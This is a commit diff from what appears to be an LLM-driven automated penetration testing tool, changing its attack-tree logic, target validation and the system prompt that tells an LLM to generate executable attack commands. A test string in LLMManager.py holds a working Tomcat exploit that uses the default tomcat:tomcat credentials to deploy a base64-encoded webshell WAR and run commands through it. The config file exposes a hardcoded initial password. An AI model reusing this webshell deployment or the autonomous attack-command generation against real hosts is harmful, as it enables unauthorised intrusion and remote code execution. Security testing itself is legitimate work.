
V0.5.5.1

before split stage bak
master
张龙 3 weeks ago
commit f5c40f6fda
  1. config.yaml (2 changed lines)
  2. mycode/AttackMap.py (50 changed lines)
  3. mycode/CommandVerify.py (2 changed lines)
  4. mycode/LLMManager.py (113 changed lines)
  5. mycode/PythonTManager.py (5 changed lines)
  6. mycode/PythoncodeTool.py (35 changed lines)
  7. mycode/TargetManager.py (184 changed lines)
  8. mycode/TaskObject.py (157 changed lines)
  9. myutils/ContentManager.py (64 changed lines)
  10. myutils/PickleManager.py (7 changed lines)
  11. pipfile (10 changed lines)
  12. test.py (50 changed lines)
  13. tools/ArpingTool.py (2 changed lines)
  14. tools/CurlTool.py (27 changed lines)
  15. tools/DigTool.py (2 changed lines)
  16. tools/DirSearchTool.py (2 changed lines)
  17. tools/DirbTool.py (2 changed lines)
  18. tools/Enum4linuxTool.py (2 changed lines)
  19. tools/Hping3Tool.py (2 changed lines)
  20. tools/HydraTool.py (2 changed lines)
  21. tools/KubehunterTool.py (2 changed lines)
  22. tools/MedusaTool.py (2 changed lines)
  23. tools/MkdirTool.py (2 changed lines)
  24. tools/MsfconsoleTool.py (2 changed lines)
  25. tools/MsfvenomTool.py (2 changed lines)
  26. tools/NslookupTool.py (2 changed lines)
  27. tools/PingTool.py (2 changed lines)
  28. tools/PrintfTool.py (2 changed lines)
  29. tools/RpcclientTool.py (2 changed lines)
  30. tools/RpcinfoTool.py (2 changed lines)
  31. tools/SearchsploitTool.py (2 changed lines)
  32. tools/ShowmountTool.py (2 changed lines)
  33. tools/SmbclientTool.py (2 changed lines)
  34. tools/SmbmapTool.py (2 changed lines)
  35. tools/SmtpuserenumTool.py (2 changed lines)
  36. tools/SmugglerTool.py (2 changed lines)
  37. tools/SqlmapTool.py (2 changed lines)
  38. tools/SshpassTool.py (2 changed lines)
  39. tools/SslscanTool.py (2 changed lines)
  40. tools/Sublist3rTool.py (2 changed lines)
  41. tools/SwaksTool.py (2 changed lines)
  42. tools/TouchTool.py (2 changed lines)
  43. tools/WgetTool.py (2 changed lines)
  44. tools/WhatwebTool.py (2 changed lines)
  45. tools/WhoisTool.py (2 changed lines)
  46. tools/XvfbrunTool.py (2 changed lines)
  47. web/API/task.py (9 changed lines)
  48. web/main/static/resources/scripts/task_manager.js (9 changed lines)
  49. web/main/templates/task_manager.html (2 changed lines)

2
config.yaml

@ -25,7 +25,7 @@ LLM_max_chain_count: 10 #为了避免推理链过长,造成推理效果变差
#Node
max_do_sn: 15 #同一节点最多执行的指令次数
max_llm_sn: 5 #同一节点最多llm的提交次数
max_node_layer: 5 #根节点是0层,最多新增的层级数
#用户初始密码
pw: zfkj_123!@#
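
The new max_node_layer key is consumed in TaskObject.py below via myCongif.get_data("max_node_layer"). The actual ConfigManager is not part of this diff; as a minimal sketch, assuming config.yaml is plain YAML read with PyYAML, an equivalent reader could look like this (load_config is a hypothetical name):

import yaml

def load_config(path="config.yaml"):
    # Plain PyYAML read; the repo's myutils.ConfigManager presumably wraps something similar.
    with open(path, "r", encoding="utf-8") as f:
        return yaml.safe_load(f)

cfg = load_config()
# Keys referenced elsewhere in this commit (TaskObject reads max_node_layer).
print(cfg.get("max_do_sn"), cfg.get("max_llm_sn"), cfg.get("max_node_layer"))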

50
mycode/AttackMap.py

@ -92,7 +92,7 @@ class AttackTree:
for child_node in cur_node.children:
if child_node.name == node_name:
return child_node
# #走到这说明没有匹配到-则新建一个节点-
# #走到这说明没有匹配到-则新建一个节点- 少个layer
# newNode = TreeNode(node_name,cur_node.task_id)
# cur_node.add_child(newNode,cur_node.messages)
return None
@ -170,13 +170,14 @@ class AttackTree:
class TreeNode:
def __init__(self, name,task_id,status="未完成", vul_type="未发现"):
def __init__(self, name,task_id,node_layer,status="未完成", vul_type="未发现"):
self.task_id = task_id #任务id
self.name = name # 节点名称
self.cur_layer = node_layer # 节点当前层数
self.bwork = True # 当前节点是否工作,默认True --停止/启动
self.status = status # 节点测试状态 -- 由llm返回指令触发更新
#work_status需要跟两个list统一管理:初始0,入instr_queue为1,入instr_node_mq为2,入res_queue为3,入llm_node_mq为4,llm处理完0或1
self._work_status = -1 #0-无任务,1-待执行测试指令,2-执行指令中,3-待提交Llm,4-提交llm中, 2025-4-6新增,用来动态显示节点的工作细节。
self._work_status = 0 #0-无任务,1-待执行测试指令,2-执行指令中,3-待提交Llm,4-提交llm中, 2025-4-6新增,用来动态显示节点的工作细节。
#self.work_status_lock = threading.Lock() ---节点不能有锁
self.vul_type = vul_type # 漏洞类型--目前赋值时没拆json
self.vul_name = ""
@ -206,7 +207,7 @@ class TreeNode:
def __getstate__(self):
state = self.__dict__.copy()
for attr in ('work_status_lock'):
for attr in ('work_status_lock',):
state.pop(attr, None)
return state
@ -310,20 +311,25 @@ class TreeNode:
def update_work_status(self,work_status):
bsuccess = True
with self.work_status_lock:
if self._work_status == 1 and work_status == 2: #只允许从1-》2
self._work_status = 2
elif self._work_status == 3 and work_status == 4:#只允许从3-》4
self._work_status = 4
elif self._work_status ==4 and work_status == 0: #4->0
self._work_status = 0
elif work_status == -1:
self._work_status = 0
elif work_status == -2:
self._work_status = 2
elif work_status == -3:
self._work_status = 4
if self._work_status == 0: #初始状态
self._work_status = work_status
else:
bsuccess = False
if self._work_status == 1 and work_status == 2: #只允许从1-》2
self._work_status = 2
elif self._work_status == 3 and work_status == 4:#只允许从3-》4
self._work_status = 4
elif self._work_status ==4 and work_status == 0: #4->0
self._work_status = 0
elif work_status == -1:
self._work_status = 0
elif work_status == -2:
self._work_status = 2
elif work_status == -3:
self._work_status = 4
elif work_status == -4: #测试调用
self._work_status = 1
else:
bsuccess = False
return bsuccess
def get_work_status(self):
@ -336,7 +342,7 @@ class TreeNode:
with self.work_status_lock:
if not self.parent_messages: #为空时赋值
self.copy_messages(p_msg,c_msg)
if self._work_status in (-1,1,4):
if self._work_status in (0,1,4):
self._instr_queue.append(instr)
self._work_status = 1 #待执行
return True
@ -346,6 +352,10 @@ class TreeNode:
else:
return False,"指令数据为空"
def test_add_instr(self, instr):
self._instr_queue.append(instr)
self._llm_quere = []
def get_instr(self):
with self.work_status_lock:
if self._work_status == 2: #执行中
@ -376,8 +386,8 @@ class TreeNode:
if self._work_status in (2,0): #提交中,不要改变执行状态
self._work_status =3
else:
print("添加llm数据时,状态不是0,2,4中的一种情况")
return False,"添加llm数据时,状态不是0,2,4中的一种情况"
print("添加llm数据时,状态不是-1,0,2,4中的一种情况")
return False,"添加llm数据时,状态不是-1,0,2,4中的一种情况"
else:
return False,"待提交llm的数据为空"
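
The rewritten update_work_status above reduces to a small transition table: state 0 accepts any request; the normal forward moves are 1->2, 3->4 and 4->0; the negative codes force a state, with -4 added in this commit as a test hook. A minimal standalone sketch of those rules, using illustrative names rather than the repo's API:

# 0=idle, 1=instr queued, 2=executing, 3=LLM pending, 4=submitting to LLM.
ALLOWED = {(1, 2), (3, 4), (4, 0)}        # normal forward transitions
FORCED = {-1: 0, -2: 2, -3: 4, -4: 1}     # override codes map to a fixed state

def next_status(current, requested):
    """Return (ok, new_status) without touching any real TreeNode."""
    if current == 0:                       # initial state accepts any request
        return True, requested
    if (current, requested) in ALLOWED:
        return True, requested
    if requested in FORCED:
        return True, FORCED[requested]
    return False, current                  # everything else is rejected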

2
mycode/CommandVerify.py

@ -15,7 +15,7 @@ class CommandVerify:
strerror = ""
for node_json in node_cmds:
if "action" not in node_json:
self.logger.error(f"缺少action节点:{node_json}")
print(f"缺少action节点:{node_json}")
strerror = {"节点指令错误":f"{node_json}缺少action节点,不符合格式要求!"}
break

113
mycode/LLMManager.py

@ -12,12 +12,14 @@ from openai import OpenAIError, APIConnectionError, APITimeoutError
from myutils.ConfigManager import myCongif
from myutils.MyTime import get_local_timestr
from myutils.MyLogger_logger import LogHandler
from myutils.ContentManager import ContentManager
class LLMManager:
def __init__(self,illm_type):
self.logger = LogHandler().get_logger("LLMManager")
self.api_key = None
self.api_url = None
self.ContM = ContentManager()
#temperature设置
if illm_type == 0: #腾讯云
@ -64,31 +66,29 @@ class LLMManager:
#根节点初始化message----后续有可能需要为每个LLM生成不同的system msg
node.parent_messages = [{"role": "system",
"content":'''
你是一位渗透测试专家来指导本地程序进行渗透测试由你负责动态控制整个渗透测试过程根据当前测试状态和返回结果决定下一步测试指令推动测试前进直至完成渗透测试
你是一位资深的渗透测试专家现在由你来指导针对一个目标的渗透测试工作需要生成具体的指令交给本地程序执行再根据本地程序提交的执行结果规划下一步指令直至全面完成渗透测试
**总体要求**
1.以测试目标为根节点结合信息收集和测试反馈的结果以新的测试点作为子节点逐步规划和推进下一步测试形成树型结构测试树测试点需尽量全面
2.只有当收到当前节点的所有测试指令的结果且没有新的测试指令需要执行时再判断是否需要新增子节点进一步进行验证测试若没有则结束该路径的验证
3.若一次性新增的节点过多无法为每个节点都匹配测试指令请优先保障新增测试节点的完整性若有新增的节点未能匹配测试指令必须返回未匹配指令的节点列表
4.生成的指令有两类节点指令和测试指令指令之间必须以空行间隔不能包含注释和说明
5.本地程序会执行生成的指令但不具备分析判断和保持会话能力只会把执行结果返回提交
6.只有当漏洞验证成功后才添加该节点的漏洞信息
7.若无需要处理的节点数据节点指令可以不生成
8.若节点已完成测试测试指令可以不生成
**测试指令生成准则**
1.可以是dash指令也可以是python指令必须按格式要求生成
2.必须对应已有节点或同时生成新增节点指令
3.优先使用覆盖面广成功率高的指令不要生成重复的指令
4.若需要多条指令配合测试请生成对应的python指令完成闭环返回
5.避免用户交互必须要能返回
1.以测试目标为根节点以测试点作为子节点的形式来规划整个渗透测试方案
2.测试点的规划需要基于执行结果是测试目标涉及的且是完整的具体为a.完成信息收集根据信息收集到的内容所有可能存在中高风险的测试点b.漏洞验证成功还能进一步利用的测试点
3.新增测试点的约束只有当当前节点提交了所有测试指令的执行结果且没有新的测试指令需要验证时再统一判断是否需要新增子节点进一步进行验证测试若没有则结束该路径的验证
4.若一次性新增的子节点过多无法为每个节点都匹配测试指令请优先保障新增测试节点的全面
5.生成的指令有两类节点指令和测试指令指令之间必须以空行间隔不能包含注释和说明
6.若无节点操作节点指令可以不生成若当前节点已完成测试测试指令可以不生成
7.只有当漏洞验证成功后才能生成漏洞验证成功的指令避免误报
**节点指令格式**
- 新增节点{\"action\":\"add_node\", \"parent\": \"父节点\", \"nodes\": \"节点1,节点2\"};
- 未匹配指令的节点列表{\"action\": \"no_instruction\", \"nodes\": \"节点1,节点2\"};
- 漏洞验证成功{\"action\": \"find_vul\", \"node\": \"节点\",\"vulnerability\": {\"name\":\"漏洞名称\",\"risk\":\"风险等级(低危/中危/高危)\",\"info\":\"补充信息(没有可为空)\"}};
- 节点完成测试{\"action\": \"end_work\", \"node\": \"节点\"};
**测试指令格式**
- dash指令```dash-[节点路径]指令内容```包裹若涉及到多步指令请生成python指令
- python指令```python-[节点路径]指令内容```包裹主函数名为dynamic_fun需包含错误处理必须返回一个tuple(status, output)
- [节点路径]为从根节点到目标节点的完整层级路径
**测试指令生成准则**
1.可以是dash指令或python指令必须按格式要求生成
2.必须对应已有节点或同时生成对应新增节点指令
3.优先使用覆盖面广成功率高的指令不能同时生成重复或作用覆盖的指令
4.若需要多条指令配合测试请生成对应的python指令完成闭环返回
5.避免用户交互必须要能返回返回的结果需要能利于你规划下一步指令
**核心要求**
- 指令之间必须要有一个空行
- 需确保测试指令的节点路径和指令的目标节点一致,例如针对子节点的测试指令节点路径不能指向当前节点
@ -183,6 +183,19 @@ mysql -u root -p 192.168.1.100
node_cmds,commands = self.fetch_instruction(real_con)
return True,node_cmds,commands,reasoning_content, content
def node_cmd_repair(self,part):
'''
对节点指令的合法性修复
:param part:
:return:
'''
#遇到漏洞赋值的节点指令缺少一个大括号,目前策略自动补全
# {"action":"find_vul", "node": "8180端口-Tomcat","vulnerability": {"name":"Tomcat弱口令漏洞","risk":"高危","info":"默认凭证tomcat:tomcat可访问管理控制台"}
whole = self.ContM.extract_json(part)
if not whole: #加一次就应该很少见了,不补充多次,也暂时只针对}
part += "}"
return part
def fetch_instruction(self,response_text):
'''
*****该函数很重要需要一定的容错能力解析LLM返回内容*****
@ -229,11 +242,8 @@ mysql -u root -p 192.168.1.100
commands.append(shell_blocks[shell_index])
shell_index +=1
else:#其他的认为是节点操作指令--指令格式还存在不确定性,需要正则匹配,要求是JSON
part = self.node_cmd_repair(part)
pattern = re.compile(r'\{(?:[^{}]|\{[^{}]*\})*\}')
# 遍历所有匹配到的 JSON 结构
# strlines = part.strip('\n') #按行拆分,避免贪婪模式下,匹配到多行的最后一个}
# for strline in strlines:
for match in pattern.findall(part): #正常只能有一个
try:
node_cmds.append(json.loads(match)) # 解析 JSON 并添加到列表
@ -255,5 +265,68 @@ mysql -u root -p 192.168.1.100
if __name__ == "__main__":
llm = LLMManager(3)
strcontent = '''
{"action":"find_vul", "node": "8180端口-Tomcat","vulnerability": {"name":"Tomcat弱口令漏洞","risk":"高危","info":"默认凭证tomcat:tomcat可访问管理控制台"}
```python-[目标系统->192.168.3.107->8180端口-Tomcat]
import requests
import base64
from io import BytesIO
def dynamic_fun():
try:
# 生成包含webshell的简易WAR包
war_content = base64.b64decode(
"UEsDBBQACAgIAJdWjkwAAAAAAAAAAAAAAAAJAAQATUVUQS1JTkYv/soAAAMAUEsHCAAAAAACAAAAAAAAAFBLAwQUAA" +
"gICACXVY5MAAAAAAAAAAAAAAAAFAAAAElNQL2V4cGxvaXQuanNwU0jNycnMS8tJ5XJRKEotyS8qyUx2SSxJ5QIAUEsH" +
"CFdDq4YIAAAAEAAAAFBLAQIeAxQACAgIAJdVjkwAAAAAAgAAAAAAAAAJAAQAAAAAAAAAAADsgQAAAABNRVRBLUlORi/" +
"6ygMAABQSwECHgMUAAgICACXVY5MV0OrhggAAAASAAAAFAAAAAAAAAAAAAAAAAClAAAAElNQL2V4cGxvaXQuanNwUEsF" +
"BgAAAAACAAIAqQAAAHwAAAAAAA=="
)
# 尝试部署WAR包
deploy_url = "http://192.168.3.107:8180/manager/text/deploy?path=/exploit"
res = requests.put(
deploy_url,
auth=('tomcat', 'tomcat'),
data=war_content,
timeout=10
)
if "FAIL" in res.text:
return (False, f"Deploy failed: {res.text}")
# 验证命令执行
cmd_url = "http://192.168.3.107:8180/exploit/exploit.jsp?cmd=id"
cmd_res = requests.get(cmd_url, timeout=5)
return (True, f"Deploy success! Command result: {cmd_res.text[:100]}") if cmd_res.status_code == 200 else (
False, "Command execution failed")
except Exception as e:
return (False, f"Exploit error: {str(e)}")
```
{"action":"add_node", "parent": "8180端口-Tomcat", "nodes": "Web应用路径遍历,Tomcat版本漏洞"}
```python-[目标系统->192.168.3.107->8180端口-Tomcat->Tomcat版本漏洞]
import requests
def dynamic_fun():
try:
# 检测CVE-2020-1938
vul_check = requests.get(
"http://192.168.3.107:8180/docs/",
headers={"Host": "localhost"},
timeout=5
)
if "Apache Tomcat/8." in vul_check.headers.get('Server', ''):
return (True, "可能存在Ghostcat漏洞(CVE-2020-1938)")
return (False, "未检测到易受攻击版本")
except Exception as e:
return (False, f"检测失败: {str(e)}")
```
'''
node_cmds, commands = llm.fetch_instruction(strcontent)
print(node_cmds)
print(commands)
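
For reference, a standalone sketch of the repair-then-extract path exercised by the test block above: a single missing '}' is appended (mirroring what node_cmd_repair does via extract_json) and node commands are then pulled with the same brace-balanced regex used in fetch_instruction. Function and variable names here are illustrative only:

import json, re

NODE_JSON = re.compile(r'\{(?:[^{}]|\{[^{}]*\})*\}')  # same pattern as fetch_instruction

def repair_and_parse(part):
    # If no balanced top-level object exists, append one '}' (single-shot repair).
    depth, balanced = 0, False
    for ch in part:
        if ch == '{':
            depth += 1
        elif ch == '}':
            depth -= 1
            if depth == 0:
                balanced = True
                break
    if not balanced and depth > 0:
        part += '}'
    return [json.loads(m) for m in NODE_JSON.findall(part)]

truncated = '{"action":"find_vul", "node": "8180端口-Tomcat",' \
            '"vulnerability": {"name":"Tomcat弱口令漏洞","risk":"高危","info":""}'
print(repair_and_parse(truncated))  # one dict, closing brace restored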

5
mycode/PythonTManager.py

@ -20,7 +20,10 @@ class PythonTManager:
return self.python_tool.start_pool()
def shutdown_pool(self):
self.python_tool.shutdown_pool()
try:
self.python_tool.shutdown_pool()
except Exception as e:
print(f"关闭进程池异常{str(e)}")
def is_pool_active(self):
return self.python_tool.pool_active

35
mycode/PythoncodeTool.py

@ -27,7 +27,11 @@ import smb
import pexpect
import smbclient
import binascii
import ftplib
import threading
from mysql.connector import Error
from Crypto.Cipher import DES
from packaging import version
from impacket.smbconnection import SMBConnection
from itertools import product
from socket import create_connection
@ -63,7 +67,8 @@ def _execute_dynamic(instruction_str):
'set': set, 'str': str, 'sum': sum, 'type': type,
'open': open, 'Exception': Exception, 'locals': locals,
'ConnectionResetError':ConnectionResetError,'BrokenPipeError':BrokenPipeError,
'bytes':bytes,'tuple':tuple,'format':format
'bytes':bytes,'tuple':tuple,'format':format,'next':next,'StopIteration':StopIteration,
'bytearray':bytearray
}
# 构造安全的 globals
safe_globals = {
@ -106,7 +111,10 @@ def _execute_dynamic(instruction_str):
'smbclient':smbclient,
'binascii':binascii,
'Error':Error,
'SMBConnection':SMBConnection
'SMBConnection':SMBConnection,
'version':version,
'DES':DES,
'ftplib':ftplib,
}
safe_locals = {}
try:
@ -149,10 +157,25 @@ class PythoncodeTool():
def shutdown_pool(self):
if self.proc_pool is not None and self.pool_active:
print("关闭进程池...")
self.proc_pool.shutdown(wait=False) #wait=True 是阻塞执行,False立即返回
self.pool_active = False
self.proc_pool = None
try:
print("关闭进程池...")
pool = self.proc_pool
self.pool_active = False
self.proc_pool = None
def _shutdown_background():
try:
# 这里是真正阻塞等待队列管理和子进程退出
pool.shutdown(wait=True)
print("进程池已完全关闭。")
except Exception as e:
print(f"后台关闭进程池时出错: {e}")
# 启动一个守护线程来做真正的 shutdown(wait=True)
t = threading.Thread(target=_shutdown_background, daemon=True)
t.start()
except Exception as e:
print(f"子进程关闭异常。。{e}")
else:
print("进程池已经是关闭状态")

184
mycode/TargetManager.py

@ -2,6 +2,16 @@
对目标资产的管理包括信息的更新维护等
'''
import re
import socket
import ipaddress
import geoip2.database
import ipwhois
import requests
import whois
import dns.resolver
import ssl
from urllib.parse import urlparse
from datetime import datetime
#pattern = r'^(https?://)?((?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}|(?:\d{1,3}\.){3}\d{1,3})(:\d+)?(/.*)?$'
pattern = r'^(https?://)?((?:[0-9]{1,3}\.){3}[0-9]{1,3}|(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,})(:\d+)?(/.*)?$'
@ -10,13 +20,44 @@ class TargetManager:
def __init__(self):
pass
def extract_and_store_ips(self,str_target: str):
# 正则匹配IP地址(包含IPv4、IPv6及带端口的情况)
ip_pattern = r'''
(?P<ipv6>\[?([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\]?| # 完整IPv6
::([0-9a-fA-F]{1,4}:){0,6}[0-9a-fA-F]{1,4})| # 缩写IPv6
(?P<ipv4>(\d{1,3}\.){3}\d{1,3})(?::\d+)? # IPv4及端口
'''
candidates = re.finditer(ip_pattern, str_target, re.VERBOSE)
valid_ips = []
for match in candidates:
raw_ip = match.group().lstrip('[').rstrip(']') # 处理IPv6方括号
# 分离IP和端口(如192.168.1.1:8080)
if ':' in raw_ip and not raw_ip.count(':') > 1: # 排除IPv6的冒号
ip_part = raw_ip.split(':')[0]
else:
ip_part = raw_ip
# 验证IP有效性并分类
try:
ip_obj = ipaddress.ip_address(ip_part)
ip_type = 'v6' if ip_obj.version == 6 else 'v4'
valid_ips.append({
'binary_ip': ip_obj.packed,
'ip_type': ip_type,
'original': ip_part
})
except ValueError:
continue
# 辅助函数:验证IPv4地址的有效性
def _is_valid_ipv4(self,ip):
parts = ip.split('.')
if len(parts) != 4:
return False
for part in parts:
if not part.isdigit() or not 0 <= int(part) <= 255:
if not part.isdigit():
return False
return True
@ -45,20 +86,145 @@ class TargetManager:
else:
return False, None,type,fake_target
#验证目标是否合法
def is_valid_target(self,target):
# Check if target is a valid IP address (IPv4 or IPv6)
try:
ip = ipaddress.ip_address(target)
if ip.version == 4:
return 'IPv4'
elif ip.version == 6:
return 'IPv6'
except ValueError:
pass
# Check if target is a valid URL
try:
result = urlparse(target)
# Only allow http or https schemes
if result.scheme not in ['http', 'https']:
return None
netloc = result.netloc
if not netloc:
return None
# Handle IPv6 addresses in URLs (enclosed in brackets)
if netloc.startswith('[') and netloc.endswith(']'):
ip_str = netloc[1:-1]
try:
ipaddress.IPv6Address(ip_str)
return 'URL'
except ValueError:
return None
# Handle potential IPv4 addresses
elif self._is_valid_ipv4(netloc):
try:
ipaddress.IPv4Address(netloc)
return 'URL'
except ValueError:
return None
# If not an IP-like string, assume it's a domain name and accept
return 'URL'
except ValueError:
return None
def collect_ip_info(self,ip):
info = {}
try:
# 首先尝试 RDAP 查询
obj = ipwhois.IPWhois(ip)
whois_info = obj.lookup_rdap()
info['asn'] = whois_info.get('asn') # 获取 ASN
info['isp'] = whois_info.get('network', {}).get('name') # 获取 ISP
except (ipwhois.exceptions.IPDefinedError, ipwhois.exceptions.ASNRegistryError,
requests.exceptions.RequestException) as e:
# 如果 RDAP 失败,回退到 WHOIS 查询
try:
whois_info = obj.lookup_whois()
info['asn'] = whois_info.get('asn') # 获取 ASN
if whois_info.get('nets'):
# 从 WHOIS 的 'nets' 中提取 ISP(通常在 description 字段)
info['isp'] = whois_info['nets'][0].get('description')
except Exception as e:
info['whois_error'] = str(e) # 记录错误信息
return info
def collect_domain_info(self,domain):
info = {}
try:
w = whois.whois(domain)
info['registrar'] = w.registrar
# 处理 creation_date
if isinstance(w.creation_date, list):
info['creation_date'] = [dt.strftime('%Y-%m-%d %H:%M:%S') if isinstance(dt, datetime) else str(dt) for
dt in w.creation_date]
elif isinstance(w.creation_date, datetime):
info['creation_date'] = w.creation_date.strftime('%Y-%m-%d %H:%M:%S')
else:
info['creation_date'] = str(w.creation_date)
# 处理 expiration_date
if isinstance(w.expiration_date, list):
info['expiration_date'] = [dt.strftime('%Y-%m-%d %H:%M:%S') if isinstance(dt, datetime) else str(dt) for
dt in w.expiration_date]
elif isinstance(w.expiration_date, datetime):
info['expiration_date'] = w.expiration_date.strftime('%Y-%m-%d %H:%M:%S')
else:
info['expiration_date'] = str(w.expiration_date)
info['user_name'] = str(w.name)
info['emails'] = str(w.emails)
info['status'] = str(w.status)
except Exception as e:
info['whois_error'] = str(e)
try:
answers = dns.resolver.resolve(domain, 'A')
info['A_records'] = [r.to_text() for r in answers]
except Exception as e:
info['dns_error'] = str(e)
return info
def test(self,str_target):
target_type = self.is_valid_target(str_target)
if not target_type:
print(f"Invalid target: {str_target}")
return
if target_type == 'IPv4' or target_type == "IPv6":
#info = self.collect_ip_info(str_target)
info = "IP"
elif target_type == 'URL':
domain = urlparse(str_target).netloc
info = self.collect_domain_info(domain)
print(f"Collected info for {str_target}: {info}")
g_TM = TargetManager()
if __name__ == "__main__":
tm = TargetManager()
# 示例测试
# test_cases = [
# "256.254.1111.23",
# "8.8.8.8",
# "2001:db8::1",
# "http://www.crnn.cc/",
# "https://www.crnn.cn",
# "http://www.crnn.cc/product_category/network-security-services",
# "192.168.1.1:80",
# "example.com/path/to/resource",
# "ftp://invalid.com", # 不合规
# "http://300.400.500.600" # 不合规
# ]
test_cases = [
"http://192.168.1.1:8080/path",
"https://example.com",
"192.168.1.1:80",
"example.com/path/to/resource",
"ftp://invalid.com", # 不合规
"http://300.400.500.600" # 不合规
"http://www.crnn.cc/",
"http://www.crnn.cc/product_category/network-security-services"
]
#tm.test("https://www.crnn.cn")
for case in test_cases:
is_valid, result = tm.validate_and_extract(case)
print(f"输入: '{case}' → 合规: {is_valid}, 提取结果: {result}")
tm.test(case)
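
The new extract_and_store_ips has to tell an IPv4 ":port" suffix apart from the colons inside an IPv6 address. A minimal standalone illustration of that split using only the standard library (split_host is a hypothetical helper, not part of this commit):

import ipaddress

def split_host(raw):
    """Return (ip_obj, port) for 'a.b.c.d', 'a.b.c.d:80' or '[::1]:8080'; port may be None."""
    raw = raw.strip()
    if raw.startswith('['):                  # bracketed IPv6, optionally with port
        host, _, rest = raw[1:].partition(']')
        port = int(rest[1:]) if rest.startswith(':') else None
        return ipaddress.ip_address(host), port
    if raw.count(':') == 1:                  # exactly one colon: IPv4 with port
        host, port = raw.split(':')
        return ipaddress.ip_address(host), int(port)
    return ipaddress.ip_address(raw), None   # plain IPv4 or unbracketed IPv6

for case in ("192.168.1.1:80", "2001:db8::1", "[2001:db8::1]:8080"):
    ip, port = split_host(case)
    print(case, "->", "IPv%d" % ip.version, port)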

157
mycode/TaskObject.py

@ -39,6 +39,7 @@ class TaskObject:
#全局变量
self.app_work_type = myCongif.get_data("App_Work_type") #app工作为0时,只允许单步模式工作,是附加规则,不影响正常逻辑处理
self.brun = False #任务的停止可以用该变量来控制
self.max_layer = myCongif.get_data("max_node_layer")
self.sleep_time = myCongif.get_data("sleep_time")
self.target = test_target
self.cookie = cookie_info
@ -414,19 +415,32 @@ class TaskObject:
async def put_instr_mq_async(self,node):
#这里不做状态的判断,调用前处理
self.instr_node_queue.put(node)
self.put_instr_node(node)
await self.update_node_work_status_async(node,2) #在执行--1.work_status不影响整个任务的执行,错了问题不大,2--attack_tree持久化需要出去lock信息。
async def put_llm_mq_async(self,node):
#同instr_mq
self.llm_node_queue.put(node)
self.put_llm_node(node)
await self.update_node_work_status_async(node,4) #提交中
#修改节点的执行状态,并需要基于websocket推送到前端显示 同步线程调用
def update_node_work_status(self,node,work_status):
#更新状态
bchange = node.update_work_status(work_status) #1,3会返回Flase
#基于websocket推送到前端
if work_status != 1: #llm执行完成后会发送单独的指令更新树,所以不发送1更新节点了
#判断是否是web端最新获取数据的task
if self.taskM.web_cur_task == self.task_id:
idatatype = 1
strdata = {"node_path":node.path,"node_workstatus":work_status}
asyncio.run(g_WSM.send_data(idatatype,strdata))
#web端调用
async def update_node_work_status_async(self,node,work_status):
#更新状态
bchange = node.update_work_status(work_status)
#基于websocket推送到前端
if bchange:
if work_status != 1:
#判断是否是web端最新获取数据的task
if self.taskM.web_cur_task == self.task_id:
idatatype = 1
@ -521,21 +535,32 @@ class TaskObject:
node.step_num -= 1
self.put_instr_mq(node) #2-执行中
def put_work_node(self):
'''遍历节点需要处理的任务,提交mq,load_task-在自动模式下-触发--线程安全'''
def put_work_node(self,work_type):
'''遍历节点需要处理的任务,提交mq,load_task-在自动模式下-触发--线程安全
work_type 0-人工1-自动
'''
instr_status = None
llm_status = None
if work_type == 0:
instr_status = (2,)
llm_status = (4,)
else:
instr_status = (1,2)
llm_status = (3,4)
nodes = self.attack_tree.traverse_bfs()
for node in nodes:
if not node.bwork:
continue
node_work_status = node.get_work_status()
if node_work_status in (1,2): #待执行指令
if node_work_status in instr_status: #待执行指令
if node.is_instr_empty():#说明数据有问题了,放弃掉
node.update_work_status(-1) #置0 -1作为额外的条件参数
else:
self.put_instr_node(node) #1,2都提交执行
node.update_work_status(-2)# 置2
#llm-list不处理,正常应该为空
elif node_work_status in (3,4):
elif node_work_status in llm_status:
if node.is_llm_empty():#数据有问题,放弃掉
node.update_work_status(-1)
else:
@ -551,11 +576,10 @@ class TaskObject:
iwork_status = node.get_work_status()
if iwork_status in (1,3):
node.step_num = step_num - 1 #单步步次赋值 -1 规则提交时-1,执行结束连续判断再提交
if iwork_status == 1:
self.put_instr_mq(node)
await self.put_instr_mq_async(node)
else:
self.put_llm_mq(node)
await self.put_llm_mq_async(node)
return True,"已提交单步任务"
else:
error = ""
@ -591,23 +615,11 @@ class TaskObject:
else:
return False,"当前的任务状态不允许执行单步,请检查!"
#修改节点的执行状态,并需要基于websocket推送到前端显示 同步线程调用
def update_node_work_status(self,node,work_status):
#更新状态
bchange = node.update_work_status(work_status) #1,3会返回Flase
#基于websocket推送到前端
if work_status != 1: #llm执行完成后会发送单独的指令更新树,所以不发送1更新节点了
#判断是否是web端最新获取数据的task
if self.taskM.web_cur_task == self.task_id:
idatatype = 1
strdata = {"node_path":node.path,"node_workstatus":work_status}
asyncio.run(g_WSM.send_data(idatatype,strdata))
#获取本次的提交提示词
def get_llm_prompt(self,llm_type,str_res,user_Prompt):
if llm_type == 0:
ext_Prompt = f'''
初始信息{str_res}
补充信息{str_res}
任务请开始对该目标的渗透测试工作
'''
elif llm_type == 1: # 提交指令执行结果 --- 正常提交
@ -649,10 +661,11 @@ class TaskObject:
def add_children_node(self,parent_node,children_names,cur_message=None,status="未完成"):
existing_names = {node.name for node in parent_node.children} # 现有子节点名称集合
unique_names = list(set(children_names)) # 去重
layer_num = parent_node.cur_layer + 1
for child_name in unique_names:
if child_name not in existing_names:
# 添加节点
new_node = TreeNode(child_name, parent_node.task_id, status)
new_node = TreeNode(child_name, parent_node.task_id,layer_num,status)
parent_node.add_child(new_node)
#existing_names.add(child_name) # 更新集合 -- 已经去重过了,不需要在添加到比对
@ -680,10 +693,13 @@ class TaskObject:
# #ad_instr_nodes --- 还没处理
residue_cmd_no_add = []
all_add_node = []
add_node_names = []
for node_json in node_cmds:
action = node_json["action"]
if action == "add_node": # 新增节点
if node.cur_layer >= self.max_layer:
continue #节点层级达到上限后不允许再添加子节点-- 平级的一样
parent_node_name = node_json["parent"]
# status = "未完成" #2025-4-11修改MGS-节点指令格式,取消了status
add_node_names = node_json["nodes"].replace('，', ',').split(',')
@ -691,53 +707,42 @@ class TaskObject:
if node.name == parent_node_name or parent_node_name.endswith(node.name): # 2233ai,节点名称字段会返回整个路径
# 添加当前节点的子节点 -- 这是标准情况
self.add_children_node(node, add_node_names)
all_add_node.extend(add_node_names) #只有当前节点的子节点才进行指令有无的校验补充
